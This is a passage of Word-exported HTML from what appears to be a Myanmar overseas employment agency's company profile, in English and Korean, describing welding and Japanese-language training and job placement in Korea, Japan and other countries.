style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard under the Ministry of Transport and Communications for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p><p>&nbsp;</p><h3>안녕하세요.우리 웹사이트 \"뉴코멧 영업 대행사\" &nbsp;에서 환영합니다.</h3><p>&nbsp;</p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업자등록번호</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧무역대행</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">외국인고용업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">면허를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취득하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">활동을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는자매</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업들과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">협력하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">차량</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수입허가를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청했고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각종</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관광</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업 및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">운송에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사용되는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">다양한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">유형의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">버스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기계를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직접</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">구매 판매하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">종사해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명 이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">쌍둥이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부처로부터</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">건설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">작업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">동안</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는 현재에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">한국</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소들에 일하고 싶은 미얀마</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각지에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">온</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">소수민족</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">형제들을 교통통신부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산하</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">씬마락</span><span 